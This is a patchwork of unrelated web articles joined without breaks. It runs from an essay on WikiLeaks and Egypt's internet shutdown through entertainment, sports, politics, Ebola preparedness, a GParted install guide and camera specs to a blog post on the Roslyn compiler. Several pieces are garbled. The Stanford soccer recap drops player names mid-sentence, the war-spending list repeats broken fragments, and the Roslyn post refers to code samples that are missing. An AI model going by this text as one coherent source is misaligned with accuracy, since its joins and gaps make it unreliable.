When they first came to office , the Obama team had a mantra : `` Never waste a good crisis '' . They then spent the next two years doing exactly the opposite . In the past few months we 've seen a couple of decent crises – the first involving WikiLeaks , the second involving the political upheavals in Tunisia and Egypt . Both involve the internet in one way or another . So , in the spirit of Obama Mk I , let us ponder what might be learned from them .
As far as the leaked US cables are concerned , the fury of the US administration and of certain US politicians was , for a time , positively comical . It stopped being funny when they began talking about prosecuting Julian Assange for `` espionage '' , given the draconian penalties that a conviction would carry . But the State Department 's indignation over the leaks of allegedly valuable secrets was , and remains , preposterous .
Why ? Because there is absolutely no way that a huge database containing 250,000 `` secret '' documents that can be lawfully accessed by more than a million officials can ever be secure . Any security engineer will tell you that it can not be done : if you want to keep things secret online then the only way to do it is by compartmentalising the system . Huge , monolithic systems are intrinsically insecure .
Ironically , that is how the Americans used to do it . They kept stuff in data silos . But in the recriminations after 9/11 there was a great deal of angst about the government 's failure to `` join up the dots '' , because it turned out that some of these silos had contained useful intelligence about the hijackers . So the silos were breached and linked – which is how Private Manning was able to access the system and download a quarter of a million documents on to the CD-Rom which eventually found its way to WikiLeaks .
The moral of the story : if governments want to keep information secure , then they have to think architecturally about system design . And if the UK government thinks that the NHS can put all our health information into a single , national system that can be accessed by more than 100,000 staff , and still keep it secure , then they ought to think again .
The WikiLeaks story has lessons for the rest of us too . The speed with which Amazon and PayPal dropped WikiLeaks should be a wake-up call to anyone who thinks that Cloud Computing services can be trusted to protect the interests of their customers when the government cuts up rough . The idealistic kids who signed up to participate in denial-of-service attacks on PayPal and the credit-card companies as retribution for cutting off WikiLeaks 's funding need to learn how to conceal their IP addresses before they engage in `` hacktivism '' – as many of them discovered this week when the police came knocking .
For hardcore geeks , the WikiLeaks saga should serve as a stimulant to a new wave of innovation which will lead to a new generation of distributed , secure technologies ( like the TOR networking system used by WikiLeaks ) which will enable people to support movements and campaigns that are deemed subversive by authoritarian powers . A really good example of this kind of technological innovation was provided last week by Google engineers , who in a few days built a system that enabled protesters in Egypt to send tweets even though the internet in their country had been shut down . `` Like many people '' , they blogged , `` we 've been glued to the news unfolding in Egypt and thinking of what we can do to help people on the ground . Over the weekend we came up with the idea of a speak-to-tweet service – the ability for anyone to tweet using just a voice connection . ''
They worked with a small team of engineers from Twitter and SayNow ( a company Google recently acquired ) to build the system . It provides three international phone numbers and anyone can tweet by leaving a voicemail . The tweets appear on twitter.com/speak2tweet .
What 's exciting about this kind of development is that it harnesses the same kind of irrepressible , irreverent , geeky originality that characterised the early years of the internet , before the web arrived and big corporations started to get a grip on it . Events in Egypt make one realise how badly this kind of innovation is needed . The way in which the Mubarak regime was able to shut down the net provided a sobering reminder of the power of governments that are prepared to take extreme measures . As the country disappeared from cyberspace I was suddenly struck by the thought that if PCs still came with steam-age built-in dial-up modems , Egyptians could have logged on to servers abroad and stayed connected . The only way of stopping that would be to shut down the entire phone system . And even Mubarak might have balked at that .
CLOSE Geena Davis is to reunite with the cast of ' A League of Their Own ' to play a softball game to celebrate the movie 's 25th anniversary . USA TODAY
Geena Davis comes out swinging in ' A League of Their Own . ' ( Photo11 : AccuSoft Inc . )
Geena Davis was n't aware she was making screen history as baseball standout Dottie Hinson in 1992 's A League of Their Own with co-stars Tom Hanks , Madonna , Lori Petty and Rosie O'Donnell .
When Hanks , as the gruff manager of the fictional team from the first professional all-female baseball league , called out to one of his despondent players , “ There 's no crying in baseball , ” it did n't strike Davis as an immortal moment .
“ We knew it was hella funny , ” Davis , now 61 , recalls . “ But I did n't know that was going to be a classic . That line is a signature , right up there with ‘ Hasta la vista , baby . ' ``
League has earned its place as one of America 's best sports comedies , selected for preservation in the National Film Registry by the Library of Congress in 2012 .
As the film celebrates its 25th anniversary on July 1 ( with a new Blu-ray edition out now ) , Davis recounts her memories from the League set .
Lori Petty , Tom Hanks and Geena Davis in ' A League of Their Own . ' ( Photo11 : AccuSoft Inc . )
Her audition was simple : Director Penny Marshall insisted League actors truly play ball . Davis ' audition consisted of demonstrating her baseball prowess in Marshall 's backyard .
“ ( Marshall ) wanted to make sure I could throw a ball , so that happened , ” says Davis . “ I threw the ball to her , competently got it to her , she caught it and said , ‘ OK . ' That was the whole audition . ”
Without an athletic upbringing , Davis trained intensively to flesh out her game and ultimately impressed the real baseball coaches on the set .
“ When the coaches would say , ‘ You have real untapped athletic ability , ' it was like , ‘ Oh , my God , I am coordinated . ' It just took me ( until I was ) 36 to find that out. ” ( She would go on to compete at the U.S. Olympic trials in archery in 1999 , two years after taking up the sport . )
Davis excelled at batting and that stare . “ I wanted people to say ‘ Uh-oh ' when I came to bat . ”
Geena Davis comes out swinging in ' A League of Their Own . ' ( Photo11 : AccuSoft Inc . )
Pitches were hard , balls were soft : Precautions were required for close-up batting shots . Sponge-filled balls were used — not for the batters , but the crew .
“ You 're actually hitting in the direction of the camera crew , ” says Davis . “ For close-ups , those balls were squishy . They looked like real baseballs , but they were all spongy inside so we would n't clock anyone . ”
Davis did the on-camera split : As catcher , Hinson pulls an acrobatic split when catching a foul ball , which Davis performed .
“ Penny asked if I could do a split . I said to put it later in the shooting schedule to give me time to work up to it . It 's hard to learn that quickly . But I did , '' says Davis .
She soaked in a hot tub to loosen up before the scene and nailed the split .
“ The thing I did not do was get up from it . My character does a Chuck Berry split and then hops right back up , ” says Davis . “ There was no popping up happening . I was stuck there and had to be helped up . ”
Madonna was a question mark : Davis admits she was n't sure what it would be like to work with Madonna at the height of her fame .
“ She was Madonna . We wondered if we were going to be able to talk to her . Was she going to have an entourage ? Were they going to put up walls around her where she stands ? ” Davis recalls .
Ultimately , Madonna was a team player who trained hard and insisted on sliding head-first into bases . “ That was painful . But she was so game . She was a trooper , '' says Davis .
Madonna hugs co-star Rosie O'Donnell in ' A League of Their Own . ' ( Photo11 : AccuSoft Inc . )
Read or Share this story : http : //usat.ly/2p7q9kR
Darragh McDonald has won gold in the 400m freestyle S6 at the Paralympic Games .
McDonald won the race by a huge distance in a time of 4:55.56 . Sweden 's Anders Olsson took silver in 5:03.44 , with Team GB 's Matthew Whorwood in bronze .
McDonald , who hails from Gorey is an amputee , who began swimming competitively at his local Asgard swimming club in 2006 .
He earned selection for the Beijing 2008 Paralympic Games and winning an impressive 400m freestyle silver .
The next year , he competed in the IPC European Championships , where he followed up his Paralympic success with two further silvers ( 100m Freestyle and 400m Freestyle ) .
He said : `` From this morning I knew I had more left in the tank but I did n't think there was that much . It is great , it shows how far Paralympics Swimming has come in four years .
`` I said to myself before I started that I was not going to think about times . That is what I did . ”
Meanwhile , James Scully finished fifth in a time of 2:53.03 in the final of the 200m freestyle S5 .
The time was a new PB for the Ratoath man .
Daniel Dias of Brazil won the gold medal .
Next Game : UCLA 11/2/2017 | 5:30 PM PAC-12 NETWORKS
No . 6 Stanford scored three times in the first half and closed out its regular-season road schedule with a 3-0 win at Oregon State on Sunday afternoon.The Cardinal ( 12-2-1 , 6-0-1 Pac-12 ) finished its Pac-12 slate with a perfect 5-0 mark away from home for the first time in program history and is now 9-0-1 in its last 10 conference matches away from The Farm . Stanford ( 19 points ) made it a three-team race for the league championship with the victory , eliminating Washington from the title chase . Cal ( 12 points ) and UCLA ( nine points ) are the only teams remaining with a chance to deny the Cardinal its Pac-12 four-peat . `` We 're very pleased and excited with another great road trip , '' Stanford head coachsaid . `` We had to really adjust to the Pacific Northwest playing conditions and our players did that fantastically . Today we managed to settle the ball down and play some great soccer despite it being a waterlogged field after torrential rains . `` secured his second consecutive winner in the 18minute , taking a backheel touch fromand burying his 33career goal to move into a tie for sixth in program history . In in the 25minuteslotted his third penalty of the season past OSU 's Gage Rogers andclosed out Stanford 's scoring in the 42minute when the Cardinal knocked the ball down at the top of the box andandset up the senior co-captain for his fifth of the season.Stanford has won 11 in a row over Oregon State ( 5-10-0 , 2-5-0 ) . `` The strikers they did their job , '' Gunn added . `` They caused problems and created chances , goals and goal-scoring opportunities . Yet again the back four were rock solid and Tomas ( Hilliard-Arce ) and Adam ( Mosharrafa ) were stellar as central defenders . Overall it was a really well-balanced performance today . `` The shutout was the ninth of the season for the Cardinal and the eighth of the solo variety for redshirt senior keeper , a total already tied for 10in program history . Stanford has scored 16 times in Pac-12 action and conceded just a pair of goals , both to Washington.Overall , the Cardinal is averaging 2.07 goals per outing and giving up just 0.53 and those numbers improve to 2.29 and 0.29 in conference . Always stout defensively , its 31 goals thus far are its most through 15 matches in 15 years . Stanford has scored three or more goals seven times already , something it did seven times all of last year and eight times in the championship season of 2015.Stanford will have a bye next weekend and the close with three straight on The Farm , beginning with UCLA on Thursday , Nov. 2 at 5:30 p.m. '' Now we get to come home , regroup , get excited about the conference finish and the last three games at Cagan , '' Gunn concluded .
Maryland football players are joined by Coach Randy Edsall , right , on stage after a fashion show unveiling the school 's new football uniforms . ( Toni L. Sandys/The Washington Post )
Update , Sept. 5 , 8:34 p.m. : We 've updated our gallery with new photos of the uniforms Maryland is wearing tonight against Miami .
Poll : Do you love or hate the new Maryland uniforms ? Let us know !
Early Lead : Cindy Boren takes a look at reaction to the Maryland uniforms on Twitter .
Update , 11:53 p.m. : We now have a photo gallery , which includes a few more photos than this post . Plus , the full-screen option will give you a closer look at the uniform details .
After weeks of anticipation , Maryland unveiled its new football uniforms on Monday night at a College Park fashion show . The Terrapins will have a dizzying array of uniform combinations to choose from this season , with two different helmets : one black with what seems to be a matte finish , and one white dotted with a turtle-shell pattern .
Several of the combinations can be seen in the photo above . According to the official Maryland athletics Twitter feed , fan input will be used to pick the Terps ' uniform for the opener against Miami .
Snap reaction : The all-black unis work much better than the Hoth-style all-whites . Some of them feature an intense amount of yellow . Others make me think of Iowa State .
But what do you all think ? Channel your inner fashion critic in the comments .
Maryland junior tight end Matt Furstenburg shows off a new uniform . ( Toni L. Sandys/The Washington Post )
Defensive back Cameron Chism shows off the back of his jersey . ( Toni L. Sandys/The Washington Post )
With a pair of posts on his Instagram , actor Jonathan Lipnicki has opened up about the anxiety he experienced as a kid after his early fame from 1996 's Jerry Maguire , saying that he was “ made fun of relentlessly ” when he was young , with people repeatedly telling him that he 'd “ never book a job again ” and one guy in high school calling him a “ has-been ” in front of an entire class . He says it was “ humiliating ” and that it made him “ feel like garbage every day ” to the point where he 'd have panic attacks at night because he did n't know how he 'd be able to get through the bullying the next day .
Advertisement
He did n't share his story to get sympathy , though . He wanted to show other kids that it 's possible to face vicious bullying and still come out on the other side , noting that “ it 's amazing how mean people peak in their teens ” and that it can be empowering to come through something like that and still “ chase your dreams . ”
Lipnicki also touched on his life as a child star and his desire to continue working as an actor as much as possible in a 2016 Random Roles interview with The A.V . Club . Plus , he told a story about the time Jay Mohr thought he was a recovering meth addict , which was pretty funny .
Advertisement
[ via ABC News ]
It 's an unprecedented time in society . Trans women are appearing in the media as Hollywood actresses , writers , innovators and advocates . Increased positive representation of trans people is one of the greatest things that could have happened to trans women as a group . But , in this moment of celebration , we need to ensure that more visibility does n't lead to more vulnerability .
The lack of representation made such an impact on me , that for a long time I had no idea how to parse my feelings about gender , my body , my sexuality and how I could exist in the world . In my childhood , any trans or gender non-conforming person on television or in film was almost always treated as a villain or a dead body . As graphic as that may be , that was the only representation we had . The rest were in the vein of Buffalo Bill ( a serial killer from the movie Silence of the Lambs ) or unnamed corpses in Law & Order and shows like that .
In ads at the back of New York City 's free newspapers , I can remember seeing trans women who were immensely beautiful and splayed out like models . I remember when the Village Voice had actual backpage ads for transgender escorts . I know some may think it bad that I , as a young adult , had been exposed to images of transgender women who had to do sex work to survive . But that exposure helped me . I learned the words necessary to describe what I was feeling , to describe what I am and would become . It 's where I learned the words transgender and transsexual . Most importantly , I learned the harsh realities that came with being transgender . I learned the steep price one had to pay to be oneself in a society so deeply opposed to transgender people thriving .
Contrast that with today , when we have trans women gracing the covers of magazines like Time and Vanity Fair . Trans youth can finally see people who know how they feel and have gone through what they went through . It 's a truly miraculous happening and I could n't be happier that I have witnessed it . I do n't think we 'll ever have another Silence of the Lambs moment , where transgender identity in film is diminished to a joke at best and a threat to ‘ ordinary ' people at worst – at least not without a loud backlash . But progress does come with its own added challenges .
Until recently , the only way a trans woman could thrive in life was if she had either waited to transition until she was older or if she could pull off ‘ deep stealth ' . What is deep stealth ? It 's like passing , except not only do you pass , you never speak a word of being transgender to anybody . Not a single word except to your lover or possibly your parents , if you still had a relationship with them . If you could n't do that , you had to subject yourself to the hypervisibility of transgender women with it 's unending scrutiny . Paradoxically , when a person or group is hypervisible they may also be invisible , in the sense that they are treated as irrelevant by society .
This hypervisibility puts marginalized groups at risk . In terms of transgender people , this often means transgender women of color . With the conversation around equality for trans people reaching its fever pitch , those who do not want us to become equal and have equal rights are becoming increasingly more violent towards us . This year alone , 18 trans women - many of them of color - have been killed , including Mya Hall who was shot near Baltimore after she took a wrong turn . This breaks last year 's record . It should be noted that a large majority of anti-LGBT hate crimes are directed at people of color .
Hypervisibility is what turns trans women 's lives into spectacle . When the media , and the society at large , ask invasive questions about surgical status or former names , those are just some of the ways that hypervisibility acts in our day-to-day lives as trans women . Famous trans women , such as Laverne Cox , have been ambushed with questions like that . Media personalities asking inappropriate questions – even after being told that they would n't answer any of them – and then having the audacity to be upset when people refuse to answer them mirror what the average trans woman goes through on perhaps a day-to-day basis . Unlike a famous person , though , it 's not an interview we can walk away from . Sometimes these questions are loaded , impacting our personal lives or even ending in violence if we do n't answer them or do n't answer them correctly .
In the same vein , in conversations surrounding trans people , one of the most common things that comes up is the topic of passing . This topic is probably the most difficult one to deal with . People - even well-meaning ones - do n't understand that passing is n't a cure all to the violence we face , nor is it possible for some trans women . Whether by circumstance or something else , there are trans women who do n't ‘ pass ' . And that 's okay . It should n't determine whether we get to live . And either way , many of the trans women who were murdered thus far ( not just this year , but these past few decades ) passed . Many were beautiful . Some could have even been stealth if they chose to be . Nonetheless , they were still murdered for being trans .
There is no panacea for transphobia . Having famous trans women in the media is great , but it is n't enough . We need to start reconsidering the value we place on gender in our lives , and in others ' lives . We need to start considering , as a society , that all people are worthy of respect and of life regardless of how we feel about gender , gender identity and gender expression .
Advertisement Feds want on-site look at Nebraska Medical Center 's biocontainment unit Share Copy Link Copy
The Ebola crisis in West Africa is the worst in history . Two American health care workers are gravely ill and will soon be flown to a hospital in Atlanta.They 'll be the first Ebola patients to ever be treated in the U.S . But that begs the question : will more come here ? The U.S. State Department reached out to the Nebraska Medical Center 's biocontaintment patient care unit on Wednesday , saying they wanted an on-site look -- a `` be prepared '' move in the face of a crisis.Video : State Dept . calls on Nebraska Medical Center just in caseDoctors at NMC said they 're prepared and honored to be called.It 's a scenario no one wants , but here 's how it could happen : '' Someone gets off an airplane in Omaha or St. Louis with Ebola , and they 're here already , and what do we do with them to keep the community safe ? '' said Dr. Phillip Smith , medical director.Patients would be safe in the 10-bed biocontainment unit -- the biggest in the country , quietly ready since 2005.Smith said it 's as safe as humans can make it.Every kind of precaution from high-volume air handling , sterilization , to special medical clothing to keep the special staff safe -- and plenty of alarms at the first sign of trouble . `` I think our unit staff is our biggest asset here and that we have 30 healthcare providers , physicians , nurses , respiratory therapists and technicians who actually all volunteer staff , '' said Dr. Angela Hewlett , assistant medical director.Ebola is nasty , coming on like the flu , evolving into hemorrhagic fever , attacks the body 's blood clotting ability . Blood literally runs out of the body.To be clear , this is just a preparedness look by the State Department . `` I think what they 're doing is making a road map of resources as a backup in case things spiral out of control , '' Smith said . `` We do n't have an imminent plan for a patient being transferred here , however we are ready in case that is necessary , '' Hewlett said.Only a handful of biocontaintment locations have been called by the State Department -- they include the National Institutes of Health and the Centers for Disease Control .
Size might not matter , but name recognition certainly does .
That 's why Chubby Checker has filed a multimillion dollar lawsuit against technology giant Hewlett-Packard and its subsidiary Palm , Inc. over a smartphone application called “ The Chubby Checker , ” which reportedly estimates a man 's penis size based on his shoe size , according to a press release issued yesterday ( via Spinner ) .
“ Despite numerous attempts to cease the ‘ app , ' Hewlett Packard refused to dismantle the operation and , therefore , continues to perpetuate degrading and derogatory content directly linked to Chubby Checker , ” the press release reads . “ The ‘ app ' adversely affects Chubby Checker 's brand and value and if allowed to continue , will cause serious damage to the Plaintiff 's goodwill and will tarnish his image that he has worked to maintain over the last 50 years . ”
The TC Palm reports that the lawsuit , which was filed in Florida on February 12 , states , “ Defendants ' use of the name ‘ Chubby Checker ' in its app is likely to associate plaintiff 's ( trade ) marks with the obscene , sexual connotation and images… Purchasers of ‘ The Chubby Checker ' app and non-purchasing browsers of the associated Web page are being misled into believing that plaintiffs have endorsed defendant 's app. ” Checker , born Ernest Evans , owns a trademark of the name “ Chubby Checker ” in order to pursue business interests .
The suit claims that the “ members only ” software has been available on the Palm APP Catalog , which sells programs for Palm smartphones , since Oct. 6 , 2006 . But the $ 0.99 app 's webpage states that it 's been online since November 13 , 2010 and , as of time of writing , has only been downloaded 84 times .
“ Any of you ladies out there just start seeing someone new and wondering what the size of there [ sic ] member is , ” reads the grammatically challenged House of Palm website . “ All you need to do is find out the man 's shoe size and plug it in and do n't worry where your [ sic ] from because The Chubby Checker supports shoe measurements of different regions and types . Now with the Chubby Checker there is no need for disappointment or surprise… ”
A screenshot of the app captures the following message : “ Based on Shoe size to Chubby size conversion . Da Chubby size is 4.25 inches ( 10.8 cm . ) ”
Checker 's suit states that he has received no compensation for the unauthorized use of his name and trademark , and demands “ all profits ” earned from the not-very-popular app . HP has distanced itself from “ The Chubby Checker , ” telling tech site WebOSNation in a statement , “ The application was removed in September 2012 and is no longer on any Palm or HP hosted web site. ” As TC Palm notes , a disclaimer on the House of Palm site says that it “ is not a property of Palm Inc. and should not be misled to be a Palm Inc. entity . ”
But Checker 's lawyers are concerned with the people who downloaded “ The Chubby Checker ” app ( all 84 of them ) , who were misled to thinking the 71-year-old singer signed off on the project .
“ This lawsuit is about preserving the integrity and legacy of a man who has spent years working hard at his musical craft and has earned the position of one of the greatest musical entertainers of all time , ” said Willie Gary , Checker 's attorney . “ We can not sit idly and watch as technology giants or anyone else exploits the name or likeness of an innocent person with the goal of making millions of dollars . The Defendants have marketed Chubby Checkers ' name on their product to gain a profit and this just is n't right . ”
This one is hard to take .
Police are asking the public to be on the lookout for the driver of a white Toyota pickup who plowed into an East LA bike rider , then simply drove off without so much as slowing down .
KTLA-5 reports the wreck , which occurred at 9:15 am Monday , was caught on a security camera ; fair warning , the video is stomach churning , to say the least .
The victim , who has n't been publicly identified , was riding east on the north sidewalk of Olympic Blvd when he attempted to cross Arizona Ave in the crosswalk . The driver of the pickup , which was headed south on Arizona , went through the red light , violently knocking the rider off his bike before turning right and speeding down Olympic .
The victim was transported to County USC Medical Center with major head trauma .
The CHP , which investigates major traffic collisions in unincorporated areas of the county , is looking for a white , mid- ‘ 80s Toyota pickup with an extended cab , metal rack and black side graphics .
Anyone with information is urged to call 323-980-4600 or the Traffic Management Center ( TMC ) at 323-259-2010 .
Let 's find this heartless jerk .
Share this : Facebook
Twitter
More
Tumblr
Pinterest
Reddit
Email
Stars and Stripes With talk of trimming the defense budget floating about Washington , lawmakers are eager to nail down what 's being spent where but despite their best efforts , answers are proving hard to find .
Stars And Stripes reports that as of May 2011 , U.S. efforts in Afghanistan and Iraq totaled $ 9.7 billion a month , or roughly the entire annual budget of The Environmental Protection Agency .
While the total amount spent on the two wars could range anywhere from $ 3.7 up to $ 5.2 trillion , depending on how much the Pentagon pulled from its base budget , even small chunks could power many efforts at home .
The amount the U.S. spends in Afghanistan and Iraq each month could run the entire State Department for four months .
For the cost of one month in Iraq and Afghanistan , NASA could have launched the space shuttle five more times .
Medicare 's 2003 expanded drug benefits for seniors that will cost $ 385 billion over 10 years could be paid for with 40 months of Pentagon spending in Iraq and Afghanistan .
for seniors that will cost $ 385 billion over 10 years could be paid for with of Pentagon spending in Iraq and Afghanistan . Two years of air conditioning for troops in Afghanistan at $ 38 billion could provide 40 years of federal Amtrak funding .
for troops in Afghanistan at Five years of fuel for vehicles , generators and aircraft in Afghanistan at $ 10.3 billion could have paid for the 2010 EPA budget .
The Senate Judiciary Committee on Monday postponed a scheduled hearing on a program that shields young immigrants from deportation .
Sen. Chuck Grassley Charles ( Chuck ) Ernest GrassleyOvernight Health Care : Drug execs set for grilling | Washington state to sue over Trump rule targeting Planned Parenthood | Wyoming moves closer to Medicaid work requirements Senate reignites blue slip war over Trump court picks Lower refunds amplify calls to restore key tax deduction MORE ( R-Iowa ) made the call to push back the hearing on the Deferred Action for Childhood Arrivals ( DACA ) immigration program , originally set for Wednesday .
The statement did not specify when the hearing will be rescheduled , which is up to `` the call of the chair . ''
The committee , according to NBC News reporter Frank Thorp V , postponed the hearing because the Trump administration said it was focused on hurricane response and recovery efforts . Disaster relief has crowded onto the agenda after hurricanes and heavy rains in Texas and Florida .
The House voted last week to provide $ 7.85 billion in Hurricane Harvey disaster relief to Texas and Louisiana .
Lawmakers are grappling with what to do for DACA recipients following the Justice Department 's announcement last week that the program will be phased out over the next six months .
The Obama-era program has protected about 800,000 immigrants who were brought to the country illegally as minors from deportation . Many have work permits or are attending school .
Gparted 0.16.2 has been released with important bug fixes and language translation updates . Here 's how to install or upgrade in Ubuntu 13.04 Raring , Ubuntu 12.04 Precise and Linux Mint 13 Maya , 15 Olivia .
Key changes include :
Fix crash if click apply before pending operations fully displayed
Fix FAT16/32 labels are sometimes shown corrupted
Fix regression which broke linux-swap resize
Fix to not hide the progress of the tools used ( e.g. , ntfsresize )
GParted is a GTK+ front-end to GNU Parted and the official GNOME Partition Editor application besides Disks . It 's available in Ubuntu Software Center , but old . The GetDeb repository contains the latest packages for Ubuntu 13.04 Raring , Ubuntu 12.04 Precise and their derivatives .
Install / Upgrade Gparted :
First click the link below to download the getdeb package , then double-click to install it via pop-up Ubuntu Software Center . It will add getdeb repository to your system .
Download GetDeb package
Then , run below command in terminal to update and install it . Or you can use Synaptic Package Manager to upgrade the Gparted if you have it installed .
sudo apt-get update ; sudo apt-get install gparted
PEN-F Preorder links :
Silver PEN-F in the USA/Canada at Bhphoto , Amazon , Adorama , GetOlympus , GetOlympus Canada .
Black PEN-F in the USA/Canada at Bhphoto , Amazon , Adorama , GetOlympus , GetOlympus Canada .
Silver PEN-F in EU at Amazon Deutschland , WexUk , ParkCameras .
Black PEN-F in EU at Amazon Deutschland , WexUK , ParkCameras .
Those are the PEN-F specs :
– 20MP Live MOS sensor ( made by Sony )
– 50MP high resolution shot mode
– 5-axis camera shake correction . Five stop correction ( CIPA )
– Creative dial to directly access four functions
– 2.36 million dot organic EL EVF ( S-OVF mode to extend the dynamic range )
– Mechanical shutter : 60 seconds -1/8000 seconds
– Electronic front curtain shutter ( anti-shock mode ) : 60 seconds -1/320 seconds
– Electronic shutter ( silent mode ) : 60 seconds -1/16000 seconds
– Video full HD60p
– Interval Shooting
– 4K time-lapse movie
– Continuous shooting of 10 frames / sec ( 5 frames / sec in the AF tracking )
– Wi-Fi built-in . Remote control via smartphone
– 3 inches 1.03 million dot movable LCD monitor
– AF tracking pad : EVF is capable of moving the AF point in the touch panel at the time of use
– Media SDHC / SDXC ( UHS-II compatible )
– Included with an external flash FL-LM3 . Guide number 9.1 . Bounce possible
– ISO200-25600 ( LOW : ISO80 equivalent )
– Color Black and Silver
– Price is 1499 Euro with kit lens .
via Digicameinfo
The camera will be announced on January 27 ! Follow the live blogging here on 43rumors at 5-6am London time .
Photo
Sprint and its corporate parent , the Japanese telecommunications giant SoftBank , have decided to drop their pursuit of T-Mobile US after conceding that antitrust regulators would block a deal in an industry that is dominated by just a few large players , a person briefed on the matter said on Tuesday .
The decision , made at a Sprint board meeting on Tuesday afternoon , is the second failed effort by large American wireless carriers to merge in three years . And it represents a serious blow by SoftBank to develop a big new challenger to the two giants of the American cellphone industry , Verizon and AT & T .
The end of the deal leaves open the question of what paths Sprint and T-Mobile will forge as smaller competitors to the enormous titans of their industry . Combined , the two control less than a third of the United States ' wireless market .
Shares in T-Mobile fell nearly 9 percent in after-hours trading on Tuesday , while Sprint 's shares tumbled 15 percent after the markets had closed .
Photo
In recent years , T-Mobile has shaken up the industry with an array of novel pricing plans , gaining admirers among both analysts and investors , but Sprint has lost customers for several quarters as it struggles to upgrade its network .
“ They have a lot of wood to chop , ” Craig Moffett , a research analyst at MoffettNathanson , said of Sprint . “ They will have to spend a fortune to fix their network , and they will very likely have to cut prices to stay competitive at the same time . ”
Sprint is planning at least one major change in the near term . On Wednesday morning , the company is expected to announce that it will replace its current chief executive , Daniel Hesse , with Marcelo Claure , the person briefed on the matter said .
Mr. Claure is the founder of Brightstar , a wireless services company that sold a majority stake in itself to SoftBank last year . He joined Sprint 's board in January .
The end of the talks also leaves open the question of what Deutsche Telekom , T-Mobile 's majority owner , will do next . The German telecommunications company has signaled that it would like to eventually sell off its T-Mobile stake , and a deal with Sprint would have been the quickest path to that . Much of the telecom industry has barreled relentlessly toward consolidation , as companies have grasped for bigger scale . Already this year , both Comcast and AT & T have announced huge deals meant to bolster their reach .
But the existence of both transactions — Comcast 's $ 45 billion takeover of Time Warner Cable and AT & T 's $ 49 billion purchase of DirecTV — has made the Obama administration wary of concentrating too much power in the hands of too few companies .
And a proposed combination of Sprint and T-Mobile , uniting the third- and fourth-biggest carriers in the United States , had been fiercely questioned by officials at both the Federal Communications Commission and the Justice Department . In 2011 , AT & T 's attempts to buy T-Mobile for $ 39 billion failed after the Obama administration sued to block the deal .
As recently as last month , T-Mobile and Sprint were speaking on friendly terms . The two sides had discussed a potential deal worth about $ 32 billion , people said at the time .
Ever since SoftBank bought a majority stake in Sprint , a deal that closed last summer , the company had its eye on bigger ambitions . The Japanese company 's voluble founder , Masayoshi Son , had frequently and publicly derided the state of the American wireless industry as antiquated , falling far behind other nations .
His model was what SoftBank had done in its home market , Japan , where he had taken Vodafone 's tiny wireless operation and , through a combination of deal-making , marketing and intelligent pricing , broke into the top ranks of wireless companies .
Not known for backing down in the face of long odds — he once threatened to set himself on fire in a dispute with Japanese regulators — Mr . Son boasted that he could succeed similarly in the United States , despite facing bigger and more entrenched rivals .
Still , SoftBank was forced to concede that such a union would have little chance of clearing either government regulator , this person said . One of the latest reminders that a merger would meet serious opposition came last week , when the F.C.C . signaled that it would prevent the two companies from making a joint bid in an upcoming government auction of wireless spectrum .
“ The deal never had a chance in Washington , ” Mr. Moffett said . “ Sprint seems finally to have accepted the inevitable . ”
Instead , Sprint will pursue its own turnaround plan , built in large part on updating its network and offering new pricing plans for consumers .
The company also plans to name a new chief executive on Wednesday , replacing its current head , Daniel Hesse , the person briefed on the matter said .
Meanwhile , T-Mobile may have to contend with another takeover bid . A French mobile upstart , Iliad , disclosed last week that it had bid $ 15 billion for a 56.6 percent stake in T-Mobile US .
But Deutsche Telekom spurned the offer . Iliad now is reportedly seeking additional partners to shore up a revised bid , according to press reports . Still , analysts have questioned whether a merger with T-Mobile would make sense — and whether Iliad could afford a takeover .
It is unclear whether others , such as Dish Network , will re-emerge as potential suitors for T-Mobile .
News of Sprint and SoftBank 's plan was reported earlier by The Wall Street Journal online .
Back in October 2008 Anders Hejlsberg made an announcement that C # .next would potentially ship with the notion of the “ compiler as a service ” ( around the 55minute mark for the impatient ) . Everyone was very excited . Suddenly meta-programming was about to become a boat-load easier , as it would n't require IL generation , Expression Tree building or other esoteric techniques – just plain text .
Sometime later , the codename for this initiative was dubbed “ Roslyn “ , and released its 1st CTP in October 2011 . 3 years after it 's initial announcement .
Today I aim to look at the current state of play in Roslyn , how to use it , what it is good for , what it is n't good for .
What is Roslyn ?
Roslyn principally is a rewrite of the C # Compiler in C # , and the VB.NET compiler in VB.NET . Historically both compilers were written in C++ , which has hampered the progression of the languages almost to the point of stagnancy * . For all the talk of “ opening the black box ” and allowing easier meta programming , DSL , and REPL , effectively Roslyn is a way to clean the compiler and make it easier for Microsoft to move forward with a clean code-base and is less about allowing developers to achieve the above end-goals . However this blog is going to cover the public face of Roslyn – it 's APIs .
Roslyn as an API set can really be thought of in 3 areas –
Access to the AST ( abstract syntax tree ) & compilation of the AST
Visual Studio integration
Scripting & REPL
Immediately when I see C # and scripting together I see disaster . Recently I attended the Software Architect 2012 conference where Rosyln was one of the tracks . Roslyn was heavily promoted for it 's scripting capabilities . the speaker proclaimed “ You can now provide Excel-like formulas using Roslyn ” and “ You 'll be able to let users write plugins for your software ” . My thoughts on this are simple
Excel formulas dont require a compiler . The Cellz parser by Phil Trelford is a couple of hundred lines of code and provides 90 % of the functionality of Excel . Building this as a scripting language opens the doors for security holes .
If you want to allow plugins in your application you might want to consider providing a public plugin API rather than a compiler .
If you really want scripting , consider using a scripting language – IronPython has been perfectly usable on .NET for years , along with IronRuby , IronScheme and IronJS . Other languages such as LUA ( which was specifically designed for scripting ) has .NET bindings also .
Access to the AST and compilation is more interesting and will be the focus of this blog post .
Working with Roslyn
The easiest way to get access to Roslyn is through nuget . For the code in this post I 'll be using F # which makes consuming the Roslyn API easier due to it 's advanced pattern matching .
To use Roslyn it 's also good to have a goal – in this case we 'll be attempting to take some C # code , parse it to find some “ smelly code ” , and to fix that code . The smelly code is here :
As you can see it uses a LINQ Count ( ) to see if there are > 0 items in an IEnumerable < T > and returns 1 or 0 based on the result . A simple optimization would be to replace the .Count ( ) > 0 call with .Any ( ) .
We start ( as always ) by opening the relevant Roslyn namespaces .
We can then simply load the code into the AST like so ( assuming the code is in a value called badCode )
We can print out the AST by writing a small recursive function
Which will produce the following output for our small code snippet –
As you can see – thats quite a large amount of output for such a small snippet of code . The part we 're really interested in is this
So we can define our strategy to detect this bad code as follows –
Parse the tree to find a BinaryExpressionSyntax ( the comparison in the IfStatementSyntax ) See if either side is a method call called Count ( ) See if either side is a literal with a value of “ 0 ” . Ensure the Count method is on a type of IEnumerable < T >
All nodes in Roslyn derive from a single base node called SyntaxNode so it 's useful in F # to write some Active Patterns to help deal with this :
